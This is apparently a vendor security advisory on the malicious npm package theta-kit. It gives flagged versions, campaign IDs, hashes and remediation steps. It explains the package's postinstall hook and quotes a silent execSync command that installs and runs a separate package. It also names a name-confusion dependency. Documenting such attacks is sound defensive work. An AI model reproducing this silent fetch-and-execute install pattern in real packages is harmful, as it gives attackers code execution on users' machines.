Which versions of theta-kit are malicious?

The following npm versions of theta-kit are flagged malicious: 1.0.0, 1.0.1, 1.0.2, 1.0.3. Treat any of these as compromised.

How do I remediate theta-kit if I installed it?

Remove theta-kit from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is theta-kit part of a known attack campaign?

Yes — theta-kit is associated with the IN-MAL-2026-006013, IN-MAL-2026-006026, IN-MAL-2026-006014, IN-MAL-2026-006021, IN-MAL-2026-006015, IN-MAL-2026-006025 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect theta-kit in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking theta-kit and packages like it before any post-install script runs.

Malicious package

theta-kitnpm

Malicious code in theta-kit (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5706

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall theta-kit

What this malware does

package.json declares postinstall: node dist/index.js, and dist/index.js executes Model.resetor() at module top level — meaning both npm install theta-kit and require('theta-kit') hand control to a separate package, 'theta-connector'. resetor() instantiates new ThetaConnector({}) and calls db.queryDBConnect(). If 'theta-connector' is not present, the catch branch silently runs execSync('npm install theta-connector --no-warnings --no-save --no-progress --loglevel silent') and then requires and executes it. The package that ultimately runs is not shipped in this tarball, so its bytes can change at any time without any update to theta-kit. Output is suppressed and errors are swallowed, hiding the fetch-and-execute from the installer. The package also declares a runtime dependency on child_process@^1.0.2, an unrelated registry placeholder sharing a name with Node's built-in module — a confusion pattern that adds a second installer-controlled execution surface. The install-time fetch-and-execute pattern, combined with the silent-self-install fallback and the unrelated 'child_process' registry dep, is unrelated to the package's advertised mobx in-memory DB purpose and gives the maintainer of 'theta-connector' arbitrary code execution on every install or require of theta-kit.

Malicious versions

4 flagged

1.0.01.0.11.0.21.0.3

Indicators of compromise (SHA-256)

09b0737ff5b0b0768e2314b014529b80609632a38dfdc3a9ad6cfd6ab1da9039

30f04104c9e5de8a18da769a2aa50e78546b12ccaf99d7c442aae79277c6e098

4f2b7b976965370ad873f7410cd353a71da0cdbe5d86dcf23a537dab34b98959

8e4af06adb727e8855bb93b3d39906e1aa504a697641cfecad7fbf51dd8e024b

eaf5ecef46a2c9c55015a7ce1b2cbd6fbe4cc2305fb2113c4889b11b26a7231e

f7f4a3e8761d93c4408de9acaf0eee18f4f0146cbef2638669054a4c19beae4b

Frequently asked questions

No. theta-kit on npm has been identified as a malicious package (versions 1.0.0, 1.0.1, 1.0.2, 1.0.3 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006013IN-MAL-2026-006026IN-MAL-2026-006014IN-MAL-2026-006021IN-MAL-2026-006015IN-MAL-2026-006025

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection